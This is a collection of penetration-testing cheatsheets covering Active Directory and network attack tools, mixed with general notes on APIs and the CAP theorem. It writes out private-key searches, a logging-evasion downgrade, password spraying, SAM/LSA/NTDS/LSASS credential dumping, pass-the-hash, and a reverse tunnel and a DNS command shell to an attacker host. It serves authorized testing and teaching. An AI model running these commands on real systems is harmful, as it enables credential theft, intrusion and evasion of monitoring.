Cheatsheets

Directory Map

- api_architecture_styles

- bloodhound

- cap_theorem

- chisel

- crackmapexec

- dig

- dnscat2

- enum4linux

- ettercap

- ffuf

- fierce

- hashcat

- http_headers

- hydra

- impacket

- john

- kerbrute

- lapstoolkit

- latency_numbers

- lazagne

- ldapsearch

- linkedin2username

- make_files

- medusa

- metasploit

- mimikatz

- msfvenom

- ncat

- neovim

- net.exe

- netcat

- nikto

- nmap

- powershell

- powerview

- ptunnel-ng

- pypykatz

- ranger

- rdp

- regex

- responder

- rpcclient

- rubeus

- server-side template injection

- snaffler

- smbclient

- smbmap

- ssh

- tsql

- unshadow

- wafw00f

- windapsearch

- windows-credential-manager

- yaml

Commands/Tools that do not fit elsewhere

Search the filesystem for SSH private keys

grep -rnE '^-{5}BEGIN ([A-Z0-9]+ )*PRIVATE KEY-{5}$' /* 2>/dev/null
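Where grep is unavailable or awkward, the same search can be sketched in Python. This is a minimal sketch that assumes PEM-style headers on their own line. The function name find_private_keys is hypothetical. Like the regex above, it also matches the untyped PKCS#8 header (BEGIN PRIVATE KEY).

```python
import os
import re

# PEM header line, e.g. "-----BEGIN OPENSSH PRIVATE KEY-----" or "-----BEGIN PRIVATE KEY-----"
KEY_HEADER = re.compile(rb"^-{5}BEGIN (?:[A-Z0-9]+ )*PRIVATE KEY-{5}\r?$", re.MULTILINE)

def find_private_keys(root):
    """Yield paths of regular files under root that contain a private key header."""
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue  # skip symlinks, sockets, FIFOs and device files
            try:
                with open(path, "rb") as fh:
                    data = fh.read(1024 * 1024)  # cap the read; keys buried deeper in big files are missed
            except OSError:
                continue  # permission denied, file vanished, etc.
            if KEY_HEADER.search(data):
                yield path
```

Usage: `for hit in find_private_keys("/home"): print(hit)`.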

Windows Living Off the Land - Quick Reference

Check PowerShell command history for credentials

Get-Content $env:APPDATA\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt

Downgrade PowerShell to evade Script Block Logging

powershell.exe -version 2

Check for other logged-in users

qwinsta

Check Windows Defender status (CMD)

sc query windefend

Domain and trust enumeration via WMI

wmic ntdomain get Caption,Description,DnsForestName,DomainName,DomainControllerAddress

Dsquery - find users with PASSWD_NOTREQD

dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl

Dsquery - find Domain Controllers

dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName
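Both dsquery filters rely on the LDAP_MATCHING_RULE_BIT_AND rule (OID 1.2.840.113556.1.4.803). This rule matches when every bit of the given value is set in userAccountControl. Below is a minimal Python sketch of that bitwise test and of building the filter clause. The helper names are illustrative, and the flag table is only a small subset.

```python
# A few userAccountControl flags (a subset of those Microsoft documents)
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "PASSWD_NOTREQD": 0x0020,        # 32, used in the first dsquery filter
    "NORMAL_ACCOUNT": 0x0200,        # 512, ordinary user account
    "SERVER_TRUST_ACCOUNT": 0x2000,  # 8192, domain controller computer account
    "DONT_REQ_PREAUTH": 0x400000,    # Kerberos pre-auth disabled (AS-REP roastable)
}

# LDAP_MATCHING_RULE_BIT_AND: true when all bits of the value are set
BIT_AND = "1.2.840.113556.1.4.803"

def uac_filter(flag_name):
    """Build an LDAP filter clause matching accounts that have flag_name set."""
    return f"(userAccountControl:{BIT_AND}:={UAC_FLAGS[flag_name]})"

def decode_uac(uac):
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for name, bit in UAC_FLAGS.items() if (uac & bit) == bit]
```

For example, decode_uac(544) returns ['PASSWD_NOTREQD', 'NORMAL_ACCOUNT'] (512 + 32). That is an enabled user the PASSWD_NOTREQD query would return.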

API Architectural Styles

REST

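REST, proposed by Roy Fielding in 2000, is the most widely used style. It is often used between front-end clients and back-end services. It is defined by six architectural constraints: client-server, statelessness, cacheability, uniform interface, layered system, and (optionally) code on demand. The payload format can be JSON, XML, HTML, or plain text.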

GraphQL

GraphQL was publicly released by Facebook (now Meta) in 2015. It provides a schema and type system and suits complex systems where the relationships between entities are graph-like. For example, in the diagram below, GraphQL retrieves user and order information in one call, while REST needs multiple calls.

GraphQL is not a replacement for REST. It can be built upon existing REST services.



WebSocket

WebSocket is a protocol that provides full-duplex communication over a single TCP connection. Clients open WebSocket connections to receive real-time updates from back-end services. Unlike REST, where the client always “pulls” data, WebSocket lets the server “push” data.
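A WebSocket connection starts as an HTTP/1.1 Upgrade request. The server proves it understood the handshake by returning a Sec-WebSocket-Accept header, derived from the client's Sec-WebSocket-Key as defined in RFC 6455. Here is a minimal Python sketch of that derivation; the function name is illustrative.

```python
import base64
import hashlib

# Fixed GUID defined by RFC 6455
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"

def websocket_accept(sec_websocket_key: str) -> str:
    """Compute the Sec-WebSocket-Accept value for a client's Sec-WebSocket-Key."""
    digest = hashlib.sha1((sec_websocket_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")
```

After the server answers with 101 Switching Protocols and this header, both sides exchange frames over the same TCP connection. That is what lets the server push updates without being polled.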

Webhook

Webhooks are usually used for asynchronous calls from third-party services. For example, we might use Stripe or PayPal as payment channels and register a webhook for payment results. When the third-party payment service finishes, it notifies our payment service whether the payment succeeded or failed. Webhook calls are usually part of the system’s state machine.
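Because webhook calls usually drive the system's state machine, the receiving handler often reduces to "apply this event to the order's current state". Below is a minimal Python sketch. The states, event names and apply_payment_event helper are hypothetical; they are not Stripe's or PayPal's actual event schema.

```python
# Allowed transitions for a hypothetical order payment state machine
TRANSITIONS = {
    ("PENDING_PAYMENT", "payment.succeeded"): "PAID",
    ("PENDING_PAYMENT", "payment.failed"): "PAYMENT_FAILED",
    ("PAYMENT_FAILED", "payment.succeeded"): "PAID",  # customer retried
}

def apply_payment_event(current_state: str, event_type: str) -> str:
    """Return the new state; unknown or duplicate events leave the state unchanged.

    Providers may deliver the same event more than once, so the handler is
    idempotent: an event with no matching transition is simply ignored.
    """
    return TRANSITIONS.get((current_state, event_type), current_state)
```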

gRPC

Open-sourced by Google in 2015 and released as 1.0 in 2016, gRPC is used for communication among microservices. The gRPC library handles encoding/decoding (Protocol Buffers by default) and data transmission (over HTTP/2).

SOAP

SOAP stands for Simple Object Access Protocol. Its payload is XML only, suitable for communications between internal systems.

BloodHound Cheatsheet

Active Directory relationship visualization and attack path discovery tool.

- GitHub: https://github.com/BloodHoundAD/BloodHound

- Requires data collection (via SharpHound or bloodhound-python) and a Neo4j database

Components

| Component | Description |

|---|---|

| BloodHound | GUI for visualizing and querying AD relationships |

| SharpHound | C# data collector (runs on Windows domain-joined hosts) |

| bloodhound-python | Python-based remote collector (runs from Linux) |

| Neo4j | Graph database backend |

Installation

BloodHound + Neo4j (Linux)

sudo apt install bloodhound neo4j

sudo neo4j console

Default Neo4j credentials: neo4j:neo4j (change on first login at http://localhost:7474)

bloodhound-python (Linux Collector)

pip install bloodhound

Data Collection

SharpHound (Windows)

All Collection Methods

.\SharpHound.exe -c All --zipfilename output

Specific Collection Methods

.\SharpHound.exe -c DCOnly

.\SharpHound.exe -c Session,LoggedOn

.\SharpHound.exe -c Group,Trusts,ACL

With Credentials

.\SharpHound.exe -c All -d domain.local --ldapusername user --ldappassword pass

Loop Session Collection

.\SharpHound.exe -c Session --Loop --LoopDuration 02:00:00 --LoopInterval 00:05:00

SharpHound Collection Methods

| Method | Description |

|---|---|

| Default | Group membership, domain trusts, local admin, sessions |

| All | All collection methods |

| DCOnly | Collectable from DC only (no host enumeration) |

| Session | Session data |

| LoggedOn | Privileged session collection |

| Group | Group membership |

| Trusts | Domain trust data |

| ACL | ACL data |

| ObjectProps | Object properties |

| Container | OU/GPO container structure |

| RDP | Remote Desktop access |

| DCOM | DCOM access |

| PSRemote | PowerShell Remoting access |

| SPNTargets | SPN targets |

Additional SharpHound Flags

| Flag | Description |

|---|---|

| --zipfilename NAME | Custom output zip file name |

| -s / --searchforest | Search all domains in the forest |

| --stealth | Stealth collection (prefer DCOnly) |

| -f FILTER | Add LDAP filter to pregenerated filter |

| --computerfile FILE | File with specific computer targets |

bloodhound-python (Linux)

Basic Collection

bloodhound-python -u user -p 'Password123' -d domain.local -ns 172.16.5.5 -c All

With Specific Domain Controller

bloodhound-python -u user -p 'Password123' -d domain.local -dc dc01.domain.local -ns 172.16.5.5 -c All

Using the BloodHound GUI

Start BloodHound

sudo neo4j start

bloodhound

Import Data

- Click the “Upload Data” button (up arrow icon)

- Select the .json or .zip files from SharpHound/bloodhound-python

Built-in Queries

| Query | Description |

|---|---|

| Find all Domain Admins | Maps DA group members |

| Find Shortest Paths to Domain Admins | Attack paths to DA |

| Find Principals with DCSync Rights | Users that can perform DCSync |

| Find Computers with Unsupported OS | Legacy systems |

| Find Kerberoastable Accounts | SPNs set on user accounts |

| Find AS-REP Roastable Users | Pre-auth disabled accounts |

| Shortest Paths to High Value Targets | Quickest escalation paths |

| Find Computers Where Domain Users are Local Admin | Over-permissioned hosts |

Custom Cypher Queries

Find All Kerberoastable Users

MATCH (u:User) WHERE u.hasspn=true RETURN u.name, u.serviceprincipalnames

Find Users with Admin Count

MATCH (u:User) WHERE u.admincount=true RETURN u.name

Shortest Path from Owned User to Domain Admin

MATCH p=shortestPath((u:User {owned:true})-[*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"})) RETURN p

Find All Sessions

MATCH p=(c:Computer)-[:HasSession]->(u:User) RETURN p
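Conceptually, shortestPath in the owned-user query is a breadth-first search over directed relationships (MemberOf, AdminTo, HasSession, and so on). Below is a minimal Python sketch over a hand-written edge list. The node names and edges are hypothetical, and the edge direction follows the HasSession query above (Computer to User).

```python
from collections import deque

def shortest_attack_path(edges, start, target):
    """Breadth-first search over (source, relationship, destination) edges.

    Returns an alternating [node, relationship, node, ...] list for the path
    with the fewest edges from start to target, or None if none exists.
    """
    graph = {}
    for src, rel, dst in edges:
        graph.setdefault(src, []).append((rel, dst))

    previous = {start: None}  # node -> (parent, relationship used to reach it)
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            path = [node]
            while previous[node] is not None:
                parent, rel = previous[node]
                path[:0] = [parent, rel]  # prepend "parent -rel->"
                node = parent
            return path
        for rel, nxt in graph.get(node, []):
            if nxt not in previous:  # first visit in BFS is via a shortest route
                previous[nxt] = (node, rel)
                queue.append(nxt)
    return None

# Hypothetical relationships in the spirit of BloodHound edges
EDGES = [
    ("JDOE@DOMAIN.LOCAL", "MemberOf", "HELPDESK@DOMAIN.LOCAL"),
    ("HELPDESK@DOMAIN.LOCAL", "AdminTo", "WS01.DOMAIN.LOCAL"),
    ("WS01.DOMAIN.LOCAL", "HasSession", "ADMIN1@DOMAIN.LOCAL"),
    ("ADMIN1@DOMAIN.LOCAL", "MemberOf", "DOMAIN ADMINS@DOMAIN.LOCAL"),
    ("JDOE@DOMAIN.LOCAL", "CanRDP", "WS02.DOMAIN.LOCAL"),
]
```

Real BloodHound graphs are far larger, and Neo4j's implementation is optimized. The idea, though, is the same: the fewest hops from an owned node to a target.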

Tips

- Mark compromised users/computers as “Owned” to find paths from your current position

- Mark high-value targets to focus path discovery

- Use “Shortest Paths from Owned Principals” after marking owned nodes

- Session data is time-sensitive; re-collect periodically with --Loop

- DCOnly collection is stealthier (no host enumeration)

- Export graphs and paths for inclusion in reports

CAP theorem

The CAP theorem states that a distributed system cannot simultaneously provide more than two of these three guarantees: consistency, availability, and partition tolerance. Because network partitions cannot be ruled out in practice, the real choice during a partition is between consistency and availability.

- Consistency

  - All clients see the same data at the same time, no matter which node they connect to

- Availability

  - Every request to a non-failing node receives a response

- Partition Tolerance

  - The system keeps operating even if the network between nodes is partitioned (messages are lost or delayed)
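Here is a toy Python model of the trade-off during a partition, assuming two replicas holding a single value. The class and mode names are hypothetical. In CP mode a replica refuses writes it cannot replicate, giving up availability. In AP mode it accepts them locally and the replicas diverge, giving up consistency until the partition heals. Only writes are modeled.

```python
class TwoReplicaStore:
    """Toy store with two replicas ("a" and "b") holding one value each."""

    def __init__(self, mode):
        if mode not in ("CP", "AP"):
            raise ValueError("mode must be 'CP' or 'AP'")
        self.mode = mode
        self.values = {"a": None, "b": None}
        self.partitioned = False

    def write(self, replica, value):
        """Write via one replica; return True if the write was accepted."""
        if not self.partitioned:
            self.values["a"] = self.values["b"] = value  # replicate to both
            return True
        if self.mode == "CP":
            return False  # peer unreachable: refuse and stay consistent
        self.values[replica] = value  # AP: accept locally, peer goes stale
        return True

    def read(self, replica):
        return self.values[replica]
```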

chisel

TCP/UDP tunneling tool written in Go. Transports data over HTTP, secured with SSH. Supports SOCKS5 proxying and port forwarding.

Install

git clone https://github.com/jpillora/chisel.git

cd chisel && go build

Or grab a prebuilt binary from Releases.

Forward SOCKS5 Tunnel

Server on pivot host, client on attack host:

# Pivot host

./chisel server -v -p 1234 --socks5

# Attack host

./chisel client -v <PIVOT_IP>:1234 socks

Reverse SOCKS5 Tunnel

Server on attack host, client on pivot host:

# Attack host

sudo ./chisel server --reverse -v -p 1234 --socks5

# Pivot host

./chisel client -v <ATTACKER_IP>:1234 R:socks

Port Forwarding

Forward a specific port through the tunnel:

# Forward local 8080 to remote 80

./chisel client <SERVER_IP>:1234 8080:<TARGET_IP>:80

# Reverse: the server listens on 8080 and forwards through the client to <TARGET_IP>:80 (server needs --reverse)

./chisel client <SERVER_IP>:1234 R:8080:<TARGET_IP>:80

Proxychains Integration

Add to /etc/proxychains.conf:

[ProxyList]

socks5 127.0.0.1 1080

Then use:

proxychains xfreerdp /v:<TARGET_IP> /u:<USER> /p:<PASS>

proxychains nmap -sT -Pn <TARGET_IP>
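proxychains talks to chisel's listener on 127.0.0.1:1080 using SOCKS5 (RFC 1928). Only full TCP connects can be relayed this way, which is why nmap needs -sT. Below is a minimal Python sketch of the two client messages, assuming no proxy authentication; the function names are illustrative.

```python
import ipaddress
import struct

def socks5_greeting() -> bytes:
    # VER=5, NMETHODS=1, METHODS=[0x00 = "no authentication required"]
    return bytes([0x05, 0x01, 0x00])

def socks5_connect(host: str, port: int) -> bytes:
    """Build a SOCKS5 CONNECT request for an IP address or a hostname."""
    header = bytes([0x05, 0x01, 0x00])  # VER=5, CMD=1 (CONNECT), RSV=0
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        name = host.encode("idna")
        if len(name) > 255:
            raise ValueError("hostname too long for SOCKS5")
        address = bytes([0x03, len(name)]) + name  # ATYP=3: length-prefixed domain name
    else:
        atyp = 0x01 if ip.version == 4 else 0x04   # ATYP=1 IPv4, ATYP=4 IPv6
        address = bytes([atyp]) + ip.packed
    return header + address + struct.pack("!H", port)  # port in network byte order
```

After the proxy replies with a success code, the same TCP socket carries the RDP or nmap connect traffic. Sending a hostname (ATYP=3) lets the proxy side resolve the name.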

Common Flags

| Flag | Description |

|---|---|

| -v | Verbose output |

| -p | Server listen port |

| --socks5 | Enable SOCKS5 proxy |

| --reverse | Allow reverse tunnels (server-side) |

| R:socks | Reverse SOCKS5 remote (client-side) |

| --auth | Set username:password for authentication |

Notes

- Default SOCKS5 proxy port is 1080

- Transfer the binary to the pivot host via scp, wget, or another file transfer method

- Mind binary size for stealth; consider go build -ldflags="-s -w" to shrink it

CrackMapExec (CME) Cheatsheet

Swiss army knife for pentesting Windows/AD environments.

Basic Syntax

crackmapexec <protocol> <target> [options]

Protocols: smb, ldap, mssql, ssh, winrm, rdp, ftp

Target Specification

| Format | Example |

|---|---|

| Single IP | 10.10.10.10 |

| CIDR range | 10.10.10.0/24 |

| IP range | 10.10.10.1-50 |

| File | targets.txt |

| Hostname | dc01.domain.local |
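CME expands these formats itself. The Python sketch below shows how the IP-based formats map to individual addresses, using only the standard ipaddress module. expand_targets is a hypothetical helper: hostnames and target files are out of scope, and CME's own handling of edge cases may differ.

```python
import ipaddress

def expand_targets(spec: str):
    """Expand a single IP, a CIDR range, or a last-octet range such as 10.10.10.1-50."""
    if "/" in spec:
        # hosts() omits the network and broadcast addresses of the IPv4 network
        return [str(ip) for ip in ipaddress.ip_network(spec, strict=False).hosts()]
    if "-" in spec:
        base, last = spec.rsplit("-", 1)
        start = ipaddress.IPv4Address(base)
        count = int(last) - int(str(start).split(".")[3]) + 1
        return [str(start + i) for i in range(count)]
    return [str(ipaddress.ip_address(spec))]
```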

Authentication Options

| Option | Description | Example |

|---|---|---|

| -u USER | Username or file | -u admin or -u users.txt |

| -p PASS | Password or file | -p Password123 or -p passwords.txt |

| -H HASH | NTLM hash | -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 |

| -d DOMAIN | Domain | -d MYDOMAIN |

| --local-auth | Local authentication | For non-domain joined machines |

| -k | Kerberos auth | Uses ccache from KRB5CCNAME |

SMB Operations

Check Access

crackmapexec smb 10.10.10.10 -u admin -p Password123

Output indicators:

- [+] Success

- [-] Failure

- (Pwn3d!) Admin access

Enumerate Shares

crackmapexec smb 10.10.10.10 -u admin -p Password123 --shares

List Share Contents

crackmapexec smb 10.10.10.10 -u admin -p Password123 --spider C$ --depth 2

Enumerate Users

crackmapexec smb 10.10.10.10 -u admin -p Password123 --users

Enumerate Groups

crackmapexec smb 10.10.10.10 -u admin -p Password123 --groups

Enumerate Logged-on Users

crackmapexec smb 10.10.10.0/24 -u admin -p Password123 --loggedon-users

Enumerate Sessions

crackmapexec smb 10.10.10.10 -u admin -p Password123 --sessions

Password Policy Enumeration

Dump Domain Password Policy

crackmapexec smb 10.10.10.10 -u admin -p Password123 --pass-pol

Returns: minimum password length, password history, complexity flags, lockout threshold, lockout duration, and reset counter.

Password Spraying

Single Password Against User List

crackmapexec smb 10.10.10.10 -u users.txt -p 'Company01!' --continue-on-success

With Local Auth

crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123!' --local-auth

Command Execution

| Option | Description |

|---|---|

| -x CMD | Execute CMD command |

| -X CMD | Execute PowerShell command |

| --exec-method | Method: smbexec, atexec, wmiexec, mmcexec |

Execute CMD

crackmapexec smb 10.10.10.10 -u admin -p Password123 -x 'whoami'

Execute PowerShell

crackmapexec smb 10.10.10.10 -u admin -p Password123 -X 'Get-Process'

Specify Execution Method

crackmapexec smb 10.10.10.10 -u admin -p Password123 -x 'ipconfig' --exec-method smbexec

Credential Dumping

Dump SAM

crackmapexec smb 10.10.10.10 -u admin -p Password123 --sam

Dump LSA Secrets

crackmapexec smb 10.10.10.10 -u admin -p Password123 --lsa

Dump NTDS.dit (Domain Controller)

crackmapexec smb dc01 -u admin -p Password123 --ntds

Dump LSASS

crackmapexec smb 10.10.10.10 -u admin -p Password123 -M lsassy

Pass-the-Hash

crackmapexec smb 10.10.10.10 -u admin -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'

Modules

List available modules:

crackmapexec smb -L

Run a module:

crackmapexec smb 10.10.10.10 -u admin -p Password123 -M <module>

Common modules:

- lsassy: Dump LSASS

- mimikatz: Run Mimikatz

- spider_plus: Spider shares

- enum_av: Enumerate AV products

- gpp_password: Find GPP passwords

spider_plus Module

Spider a specific share and output all readable files as JSON:

crackmapexec smb 10.10.10.10 -u admin -p Password123 -M spider_plus --share 'Department Shares'

Output written to /tmp/cme_spider_plus/<ip>.json. Look for web.config, scripts, and files with hardcoded credentials.

Database

CME stores results in a database:

cmedb

Database commands:

- hosts: Show discovered hosts

- creds: Show captured credentials

- export: Export data

Useful Flags

| Flag | Description |

|---|---|

| --continue-on-success | Don’t stop after first valid cred |

| --no-bruteforce | Pair username and password files line by line instead of trying every combination |

| -v | Verbose output |

| --gen-relay-list FILE | Generate list of hosts with SMB signing disabled |
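When both -u and -p are files, the default is to try every user with every password. With --no-bruteforce, line 1 of each file is paired with line 1 of the other, line 2 with line 2, and so on. The itertools illustration below shows the difference; the lists are hypothetical.

```python
from itertools import product

users = ["alice", "bob", "carol"]
passwords = ["Winter2024!", "Summer2024!", "Company01!"]

# Default: every combination (3 x 3 = 9 attempts, up to 3 per account)
default_attempts = list(product(users, passwords))

# --no-bruteforce: pair by position (3 attempts, 1 per account)
paired_attempts = list(zip(users, passwords))
```

Pairing suits known user:password combinations (for example, reused credentials) and keeps per-account attempts low relative to the lockout threshold reported by --pass-pol.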

dig

dig (Domain Information Groper) is a flexible command-line tool for querying DNS name servers. It performs DNS lookups and displays the answers returned from the queried name servers.

Basic Syntax

dig [@server] [name] [type] [options]

Common Query Types

| Type | Description |

|---|---|

| A | IPv4 address |

| AAAA | IPv6 address |

| MX | Mail exchange records |

| NS | Name server records |

| TXT | Text records |

| CNAME | Canonical name (alias) |

| SOA | Start of Authority |

| PTR | Pointer record (reverse DNS) |

| SRV | Service record |

| ANY | All available records |

| AXFR | Zone transfer |

Basic Queries

# Simple A record lookup

dig example.com

# Query specific record type

dig example.com MX

dig example.com NS

dig example.com TXT

dig example.com AAAA

# Query all record types (many servers now return a minimal answer, see RFC 8482)

dig example.com ANY

Using Specific DNS Server

# Query using a specific DNS server

dig @8.8.8.8 example.com

dig @1.1.1.1 example.com

# Query the authoritative nameserver directly

dig @ns1.example.com example.com

Output Control

# Short answer only

dig example.com +short

# Detailed output with comments

dig example.com +comments

# Answer section only (cleaner output)

dig example.com +noall +answer

# Show answer, authority, and additional sections

dig example.com +noall +answer +authority +additional

# Show query time and server info

dig example.com +stats

Zone Transfers (AXFR)

# Attempt zone transfer

dig AXFR @ns1.example.com example.com

# Zone transfer with explicit +tcp (AXFR already runs over TCP, so this is optional)

dig AXFR example.com @ns1.example.com +tcp

Reverse DNS Lookups

# Reverse lookup

dig -x 8.8.8.8

# Short reverse lookup

dig -x 8.8.8.8 +short
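dig -x builds the PTR query name for you. For IPv4 it reverses the address under in-addr.arpa. For IPv6 it writes one label per nibble under ip6.arpa. Python's standard ipaddress module exposes the same name, which is handy when scripting reverse lookups; the wrapper name is illustrative.

```python
import ipaddress

def ptr_query_name(address: str) -> str:
    """Reverse-DNS name that a PTR lookup such as dig -x asks for."""
    return ipaddress.ip_address(address).reverse_pointer
```

The result can be queried directly: dig 8.8.8.8.in-addr.arpa PTR is equivalent to dig -x 8.8.8.8.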

Trace DNS Resolution

# Trace the delegation path from root

dig example.com +trace

# Trace without requesting DNSSEC records

dig example.com +trace +nodnssec

Batch Queries

# Query multiple domains from file

dig -f domains.txt

# Query multiple domains with same options

dig -f domains.txt +short

DNSSEC Queries

# Request DNSSEC records

dig example.com +dnssec

# Show DNSSEC records (RRSIG, etc.) in readable multi-line format

dig example.com +dnssec +multiline

# Query DNSKEY records

dig example.com DNSKEY +short

Useful Options

| Option | Description |

|---|---|

| +short | Display only the answer |

| +noall | Clear all display flags |

| +answer | Show answer section |

| +authority | Show authority section |

| +additional | Show additional section |

| +trace | Trace delegation from root |

| +tcp | Use TCP instead of UDP |

| +dnssec | Request DNSSEC records |

| +multiline | Verbose multi-line output |

| +nocmd | Don’t show dig command line |

| +nocomments | Don’t show comment lines |

| +nostats | Don’t show statistics |

| -x | Reverse lookup |

| -f | Read queries from file |

| -p | Specify port number |

| -4 | Use IPv4 only |

| -6 | Use IPv6 only |

Subdomain Enumeration

# Query for specific subdomain

dig www.example.com

dig mail.example.com

dig ftp.example.com

# Check for wildcard DNS

dig randomnonexistent.example.com

Troubleshooting Examples

# Check if DNS server is responding

dig @8.8.8.8 google.com +short

# Check TTL values

dig example.com +noall +answer +ttlid

# Query with timeout and retries

dig example.com +time=2 +tries=3

# Check SOA for zone info

dig example.com SOA +short

# Verify MX records

dig example.com MX +noall +answer

Security Testing

# Test for open resolver

dig @target-ip example.com

# Check for zone transfer vulnerability

dig AXFR @ns1.target.com target.com

# Enumerate DNS version (if exposed)

dig @ns1.target.com version.bind TXT CHAOS

dig @ns1.target.com hostname.bind TXT CHAOS

Output Parsing Examples

# Get just IP addresses

dig example.com +short

# Get nameservers only

dig example.com NS +short

# Get MX records with priority

dig example.com MX +noall +answer | awk '{print $5, $6}'

dnscat2

DNS tunneling tool that sends data between two hosts using DNS TXT records over an encrypted C2 channel.

Install (Server)

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server/

sudo gem install bundler

sudo bundle install

Start Server

sudo ruby dnscat2.rb --dns host=<ATTACKER_IP>,port=53,domain=<DOMAIN> --no-cache

The server outputs a --secret key for client authentication.

Client (PowerShell)

Clone dnscat2-powershell and transfer dnscat2.ps1 to target.

Import-Module .\dnscat2.ps1

Start-Dnscat2 -DNSserver <ATTACKER_IP> -Domain <DOMAIN> -PreSharedSecret <SECRET> -Exec cmd

Client (Native)

./dnscat --secret=<SECRET> <DOMAIN>

Or connect directly without a domain:

./dnscat --dns server=<ATTACKER_IP>,port=53 --secret=<SECRET>

Session Management

| Command | Description |

|---|---|

| windows | List active sessions/windows |

| window -i <id> | Interact with a session |

| kill <id> | Kill a session |

| quit | Exit dnscat2 |

| tunnels | List active tunnels |

| help | Show available commands |

Interactive Shell

dnscat2> window -i 1

Use ctrl-z to return to the dnscat2 prompt.

Notes

- Uses UDP port 53 by default

- All sessions are encrypted when using --secret/-PreSharedSecret

- Useful for environments where HTTPS is stripped/inspected but DNS is allowed out
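DNS tunnels work because every query name can carry a small payload. Labels are limited to 63 bytes and a full name to 253 characters, so data is encoded (hex here) and split across labels under the attacker-controlled domain. The Python sketch below illustrates the idea in simplified form. It is not dnscat2's actual wire format, which adds session IDs, sequence numbers and encryption, and the function name and domain are hypothetical.

```python
MAX_LABEL = 63   # maximum bytes in one DNS label
MAX_NAME = 253   # maximum characters in a full name (without trailing dot)

def encode_query_names(data: bytes, domain: str, label_len: int = MAX_LABEL):
    """Split data into hex-encoded query names of the form <label>.<label>...<domain>."""
    if not 1 <= label_len <= MAX_LABEL:
        raise ValueError("label length must be 1-63")
    # Each payload label costs label_len characters plus one dot
    labels_per_name = (MAX_NAME - len(domain)) // (label_len + 1)
    if labels_per_name < 1:
        raise ValueError("domain too long to carry any payload")
    chunk = labels_per_name * label_len
    hex_data = data.hex()
    names = []
    for start in range(0, len(hex_data), chunk):
        piece = hex_data[start:start + chunk]
        labels = [piece[i:i + label_len] for i in range(0, len(piece), label_len)]
        names.append(".".join(labels + [domain]))
    return names
```

Each name becomes one query (TXT, for example), and the server decodes the labels back into bytes. This is why tunnels generate large volumes of long, random-looking queries to a single domain.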

enum4linux Cheatsheet

Tool for enumerating information from Windows and Samba systems via SMB.

Basic Syntax

enum4linux [options] <target>

Enumeration Options

| Option | Description |

|---|---|

| -a | Do all simple enumeration (default) |

| -U | Get user list |

| -M | Get machine list |

| -S | Get share list |

| -P | Get password policy |

| -G | Get group and member list |

| -d | Detail mode (applies to -U and -S) |

| -o | Get OS information |

| -i | Get printer information |

| -n | Do nmblookup (similar to nbtstat) |

| -r | Enumerate users via RID cycling |

Authentication Options

| Option | Description | Example |

|---|---|---|

| -u USER | Username | enum4linux -u admin 10.10.10.10 |

| -p PASS | Password | enum4linux -u admin -p Password123 10.10.10.10 |

| -w DOMAIN | Workgroup/domain | enum4linux -w MYDOMAIN 10.10.10.10 |

Common Examples

Full Enumeration (Anonymous)

enum4linux -a 10.10.10.10

Enumerate Users

enum4linux -U 10.10.10.10

Enumerate Shares

enum4linux -S 10.10.10.10

Enumerate Groups

enum4linux -G 10.10.10.10

Get Password Policy

enum4linux -P 10.10.10.10

RID Cycling (User Enumeration)

enum4linux -r 10.10.10.10
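RID cycling works because every account SID is the domain (or machine) SID followed by a relative identifier (RID). enum4linux obtains the SID, then asks the target through rpcclient to resolve SIDs built from it back to names. The Python sketch below generates the candidate SIDs. The domain SID is made up, and the 500-550 and 1000-1050 ranges are a common choice rather than a statement of enum4linux's exact logic.

```python
# Well-known domain RIDs (the SID prefix varies per domain)
WELL_KNOWN_RIDS = {
    500: "Administrator",
    501: "Guest",
    502: "krbtgt",
    512: "Domain Admins",
    513: "Domain Users",
    514: "Domain Guests",
    515: "Domain Computers",
    516: "Domain Controllers",
}

def candidate_sids(domain_sid, ranges=((500, 550), (1000, 1050))):
    """Yield SIDs to resolve: domain SID + each RID in the inclusive ranges."""
    for low, high in ranges:
        for rid in range(low, high + 1):
            yield f"{domain_sid}-{rid}"

def well_known_name(sid):
    """Return the default name for a well-known RID, or None."""
    return WELL_KNOWN_RIDS.get(int(sid.rsplit("-", 1)[1]))
```

Regular user and computer accounts typically start at RID 1000 or above, which is why the second range matters.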

With Credentials

enum4linux -a -u admin -p Password123 10.10.10.10

Detailed User Enumeration

enum4linux -U -d 10.10.10.10

enum4linux-ng

Modern rewrite with additional features:

Installation

pip install enum4linux-ng

Basic Usage

enum4linux-ng 10.10.10.10

With Credentials

enum4linux-ng -u admin -p Password123 10.10.10.10

Get Password Policy

enum4linux-ng -P 10.10.10.10

Output to JSON

enum4linux-ng -oJ output.json 10.10.10.10

Output to All Formats (JSON + YAML)

enum4linux-ng -P 10.10.10.10 -oA output_prefix

Information Gathered

- Target information (hostname, domain, OS)

- User accounts and RIDs

- Group memberships

- Share listings and permissions

- Password policies

- Printer information

- NetBIOS names

ettercap

Ettercap is a comprehensive suite for man-in-the-middle (MITM) attacks on LAN. It features sniffing of live connections, content filtering, and support for active and passive dissection of protocols.

Basic Syntax

ettercap [options] [target1] [target2]

Modes

| Mode | Flag | Description |

|---|---|---|

| Text | -T | Text-only interface |

| Curses | -C | Curses-based GUI |

| GTK | -G | GTK graphical interface |

| Daemon | -D | Run as daemon |

Target Specification

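MAC/IP/IPv6/PORT (builds without IPv6 support use MAC/IP/PORT, which is the form used in the /192.168.1.1// examples below)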

Examples:

- // - All hosts

- /192.168.1.1// - Single IP

- /192.168.1.1-50// - IP range

